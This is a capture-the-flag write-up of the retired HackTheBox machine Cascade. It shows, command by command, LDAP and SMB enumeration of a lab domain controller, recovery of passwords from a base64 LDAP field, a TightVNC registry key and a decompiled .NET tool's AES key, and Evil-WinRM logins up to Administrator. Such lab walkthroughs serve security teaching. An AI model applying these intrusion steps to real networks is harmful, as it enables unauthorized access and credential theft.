HTB: Cascade

Cascade Card

This box is a writeup about a retired HacktheBox machine: Cascade publish on Mars 28 2020 by VbScrub. This box is rated as medium box. It implies some LDAP search, some SMB shares, a VNC registry, some reverse engineering and the AD Recycle Bin.

Recon

nmap

Let us start as always by a nmap scan. The box is quit busy so first of all we run a simple nmap scan:

# Nmap 7.80 scan initiated Fri Apr 10 05:54:33 2020 as: nmap -p- -sSV -oN nmap 10.10.10.182
Nmap scan report for 10.10.10.182
Host is up (0.084s latency).
Not shown: 65520 filtered ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-04-10 09:59:25Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Apr 10 05:57:39 2020 -- 1 IP address (1 host up) scanned in 185.33 seconds

As always with Windows box there is a lot of open ports and services. We try to enumerate a few of them and run enum4linux.

LDAP

The interesting service is the LDAP. When enumerating and reading the result we discover that the r.thompson account as a filed cascadeLegacyPwd containing some base64 data.

kali@kali:~$ ldapsearch -h 10.10.10.182 -p 389 -x -b "dc=cascade,dc=local"
<SNIP>
# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ryan Thompson
sn: Thompson
givenName: Ryan
distinguishedName: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109193126.0Z
whenChanged: 20200323112031.0Z
displayName: Ryan Thompson
uSNCreated: 24610
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
uSNChanged: 295010
name: Ryan Thompson
objectGUID:: LfpD6qngUkupEy9bFXBBjA==
userAccountControl: 66048
badPwdCount: 1
codePage: 0
countryCode: 0
badPasswordTime: 132309997863352844
lastLogoff: 0
lastLogon: 132247339125713230
pwdLastSet: 132230718862636251
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFVQQAAA==
accountExpires: 9223372036854775807
logonCount: 2
sAMAccountName: r.thompson
sAMAccountType: 805306368
userPrincipalName: r.thompson@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200126183918.0Z
dSCorePropagationData: 20200119174753.0Z
dSCorePropagationData: 20200119174719.0Z
dSCorePropagationData: 20200119174508.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132294360317419816
msDS-SupportedEncryptionTypes: 0
cascadeLegacyPwd: clk0bjVldmE=

We decode it and found the password rY4n5eva for the r.thompson account.

kali@kali:~$  echo -ne 'clk0bjVldmE=' | base64 -d
rY4n5eva

SMB share

Using this account we can enumerate the available SMB shares.

kali@kali:~$  smbclient -L \\\\10.10.10.182 -U 'r.thompson'
Unable to initialize messaging context
Enter WORKGROUP\r.thompson's password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        Audit$          Disk
        C$              Disk      Default share
        Data            Disk
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        print$          Disk      Printer Drivers
        SYSVOL          Disk      Logon server share
SMB1 disabled -- no workgroup available

We mount the Data share using our account and list its content, the file VNC Install.reg inside s.smith folder seems interesting.

kali@kali:~$  sudo mount //10.10.10.182/Data /mnt/ -o username=r.thompson
tree /mnt/
/mnt/
├── Contractors
├── Finance
├── IT
│   ├── Email Archives
│   │   └── Meeting_Notes_June_2018.html
│   ├── LogonAudit
│   ├── Logs
│   │   ├── Ark AD Recycle Bin
│   │   │   └── ArkAdRecycleBin.log
│   │   └── DCs
│   │       └── dcdiag.log
│   └── Temp
│       ├── r.thompson
│       └── s.smith
│           └── VNC Install.reg
├── Production
└── Temps

13 directories, 4 files

This VNC Install.reg file inside s.smith folder is the Windows Registry of a VNC installation. The Password entry is really interesting.

kali@kali:~$ cat /mnt/IT/Temp/s.smith/VNC\ Install.reg
��Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"DisconnectClients"=dword:00000001
"PollingInterval"=dword:000003e8
"AllowLoopback"=dword:00000000
"VideoRecognitionInterval"=dword:00000bb8
"GrabTransparentWindows"=dword:00000001
"SaveLogToAllUsersPath"=dword:00000000
"RunControlInterface"=dword:00000001
"IdleTimeout"=dword:00000000
"VideoClasses"=""
"VideoRects"=""

A few Google search lead us to github repository explaining how to decrypt the password using the Interactive Ruby Shell from metasploit.

$ msfconsole
msf5 > irb
[*] Starting IRB shell...
[*] You are in the "framework" object

irb: warn: can't alias jobs from irb_jobs.
>> fixedkey = "\x17\x52\x6b\x06\x23\x4e\x58\x07"
=> "\u0017Rk\u0006#NX\a"
>> require 'rex/proto/rfb'
=> true
>> Rex::Proto::RFB::Cipher.decrypt ["6BCF2A4B6E5ACA0F"].pack('H*'), fixedkey
=> "sT333ve2"

With this account we can connect to the box using evil-winrm. We quickly found the user flag inside on our user Desktop.

kali@kali:~/tools/github/evil-winrm$ ruby ./evil-winrm.rb -i 10.10.10.182 -u s.smith -p sT333ve2

Evil-WinRM shell v1.8

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\s.smith\Documents> type "C:\Users\s.smith\Desktop\user.txt"
6c624e1637cf604fec1cda8de1ad0779

Getting root

We try to mount some other share with our s.smith account. Audit is interesting as there is a executable binary CascAudit.exe, a DLL CascCrypto.dll, and a SQLite Database Audit.db.

kali@kali:~$ sudo mount //10.10.10.182/Audit$ /mnt/ -o username=s.smith
Password for s.smith@//10.10.10.182/Audit$:  ********
kali@kali:~$ tree /mnt/
/mnt/
├── CascAudit.exe
├── CascCrypto.dll
├── DB
│   └── Audit.db
├── RunAudit.bat
├── System.Data.SQLite.dll
├── System.Data.SQLite.EF6.dll
├── x64
│   └── SQLite.Interop.dll
└── x86
    └── SQLite.Interop.dll

3 directories, 8 files

We load the executable in DNSpy and look at the code. We saw a function that use the Crypto DLL to decrypt a text providing from the database using the key c4scadek3y654321.

using (SQLiteConnection sqliteConnection = new SQLiteConnection("Data Source=" + MyProject.Application.CommandLineArgs[0] + ";Version=3;"))
{
  string str = string.Empty;
  string password = string.Empty;
  string str2 = string.Empty;
  try
  {
    sqliteConnection.Open();
    using (SQLiteCommand sqliteCommand = new SQLiteCommand("SELECT * FROM LDAP", sqliteConnection))
    {
      using (SQLiteDataReader sqliteDataReader = sqliteCommand.ExecuteReader())
      {
        sqliteDataReader.Read();
        str = Conversions.ToString(sqliteDataReader["Uname"]);
        str2 = Conversions.ToString(sqliteDataReader["Domain"]);
        string text = Conversions.ToString(sqliteDataReader["Pwd"]);
        try
        {
          password = Crypto.DecryptString(text, "c4scadek3y654321");
        }
        catch (Exception ex)
        {
          Console.WriteLine("Error decrypting password: " + ex.Message);
          return;
        }
      }
    }
    sqliteConnection.Close();
  }

We repeat the SQL request using sqlite3 and got some base64 data for the user ArkSvc.

kali@kali:~/pown/htb_cascade$ sqlite3 Audit.db
SQLite version 3.31.0 2019-12-29 00:52:41
Enter ".help" for usage hints.
sqlite> SELECT * FROM LDAP;
1|ArkSvc|BQO5l5Kj9MdErXx6Q6AGOw==|cascade.local

We look at the crypto code in the DLL (still using DNSpy). This is a simple AES using a fix IV and the key passed in parameter by the executable binary.

// Token: 0x06000013 RID: 19 RVA: 0x00002360 File Offset: 0x00000760
public static string DecryptString(string EncryptedString, string Key)
{
  byte[] array = Convert.FromBase64String(EncryptedString);
  Aes aes = Aes.Create();
  aes.KeySize = 128;
  aes.BlockSize = 128;
  aes.IV = Encoding.UTF8.GetBytes("1tdyjCbY1Ix49842");
  aes.Mode = CipherMode.CBC;
  aes.Key = Encoding.UTF8.GetBytes(Key);
  string @string;
  using (MemoryStream memoryStream = new MemoryStream(array))
  {
    using (CryptoStream cryptoStream = new CryptoStream(memoryStream, aes.CreateDecryptor(), CryptoStreamMode.Read))
    {
      byte[] array2 = new byte[checked(array.Length - 1 + 1)];
      cryptoStream.Read(array2, 0, array2.Length);
      @string = Encoding.UTF8.GetString(array2);
    }
  }
  return @string;
}

Here is the CyberChef recipe to decode the password: w3lc0meFr31nd.

From there we can can connect with the ArkSvc account using evil-winrm and enumerate our permissions.

kali@kali:~/tools/github/evil-winrm$ ruby ./evil-winrm.rb -i 10.10.10.182 -u ArkSvc -p w3lc0meFr31nd

Evil-WinRM shell v1.8

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\arksvc\Documents> whoami /all

USER INFORMATION
----------------

User Name      SID
============== ==============================================
cascade\arksvc S-1-5-21-3332504370-1206983947-1165150453-1106


GROUP INFORMATION
-----------------

Group Name
===========================================
Everyone
BUILTIN\Users
BUILTIN\Pre-Windows 2000 Compatible Access
NT AUTHORITY\NETWORK
NT AUTHORITY\Authenticated Users
NT AUTHORITY\This Organization
CASCADE\Data Share
CASCADE\IT
CASCADE\AD Recycle Bin
CASCADE\Remote Management Users
NT AUTHORITY\NTLM Authentication
Mandatory Label\Medium Plus Mandatory Level


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

We are in the group AD Recycle Bin. A few Google research lead us to a Microsoft article about AD recycle bin.

We execute the Powershell command to list the deleted objects and see some cascadeLegacyPwd filed for the user TempAdmin.

*Evil-WinRM* PS C:\Users\arksvc\Desktop>  Get-ADObject -filter 'isdeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property *

<SNIP>

CanonicalName                   : cascade.local/Deleted Objects/User
                                  DEL:746385f2-e3a0-4252-b83a-5a206da0ed88
CN                              : User
                                  DEL:746385f2-e3a0-4252-b83a-5a206da0ed88
Created                         : 1/26/2020 2:34:31 AM
createTimeStamp                 : 1/26/2020 2:34:31 AM
Deleted                         : True
Description                     :
DisplayName                     :
DistinguishedName               : CN=User\0ADEL:746385f2-e3a0-4252-b83a-5a206da0ed88,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData           : {1/1/1601 12:00:00 AM}
instanceType                    : 4
isDeleted                       : True
LastKnownParent                 : CN={A403B701-A528-4685-A816-FDEE32BDDCBA}\0ADEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e,CN=Deleted Objects,DC=cascade,DC=local
Modified                        : 1/26/2020 2:40:52 AM
modifyTimeStamp                 : 1/26/2020 2:40:52 AM
msDS-LastKnownRDN               : User
Name                            : User
                                  DEL:746385f2-e3a0-4252-b83a-5a206da0ed88
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  :
ObjectClass                     : container
ObjectGUID                      : 746385f2-e3a0-4252-b83a-5a206da0ed88
ProtectedFromAccidentalDeletion : False
sDRightsEffective               : 0
showInAdvancedViewOnly          : True
uSNChanged                      : 196700
uSNCreated                      : 196690
whenChanged                     : 1/26/2020 2:40:52 AM
whenCreated                     : 1/26/2020 2:34:31 AM

accountExpires                  : 9223372036854775807
badPasswordTime                 : 0
badPwdCount                     : 0
CanonicalName                   : cascade.local/Deleted Objects/TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd                : YmFDVDNyMWFOMDBkbGVz
CN                              : TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage                        : 0
countryCode                     : 0
Created                         : 1/27/2020 3:23:08 AM
createTimeStamp                 : 1/27/2020 3:23:08 AM
Deleted                         : True
Description                     :
DisplayName                     : TempAdmin
DistinguishedName               : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData           : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName                       : TempAdmin
instanceType                    : 4
isDeleted                       : True
LastKnownParent                 : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff                      : 0
lastLogon                       : 0
logonCount                      : 0
Modified                        : 1/27/2020 3:24:34 AM
modifyTimeStamp                 : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN               : TempAdmin
Name                            : TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  :
ObjectClass                     : user
ObjectGUID                      : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid                       : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID                  : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet                      : 132245689883479503
sAMAccountName                  : TempAdmin
sDRightsEffective               : 0
userAccountControl              : 66048
userPrincipalName               : TempAdmin@cascade.local
uSNChanged                      : 237705
uSNCreated                      : 237695
whenChanged                     : 1/27/2020 3:24:34 AM
whenCreated                     : 1/27/2020 3:23:08 AM

We decode the base64 filed and found some password.

kali@kali:~$ echo -ne 'YmFDVDNyMWFOMDBkbGVz' | base64 -d
baCT3r1aN00dles

My first idea was to restore the object but it seems that this is not possible.

*Evil-WinRM* PS C:\Users\arksvc\Documents>  Get-ADObject -Filter 'samaccountname -eq "TempAdmin"' -IncludeDeletedObjects | Restore-ADObject
Insufficient access rights to perform the operation
At line:1 char:81
+ ... ccountname -eq "TempAdmin"' -IncludeDeletedObjects | Restore-ADObject
+                                                          ~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (CN=TempAdmin\0A...ascade,DC=local:ADObject) [Restore-ADObject], ADException
    + FullyQualifiedErrorId : 0,Microsoft.ActiveDirectory.Management.Commands.RestoreADObject

Therefore I just tried to connect as administrator hoping for password reuse, it worked and I was able to get the root flag..

kali@kali:~/tools/github/evil-winrm$ ruby ./evil-winrm.rb -i 10.10.10.182 -u administrator -pbaCT3r1aN00dles

Evil-WinRM shell v1.8

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
86e93219a4f189663d558122a087a4c3

Wrapping up

This box was fun as there was a lot of different stuff and everything went smoothly. The only painful part is the dig into the ldapsearch results as the file is quit long (6 363 lines).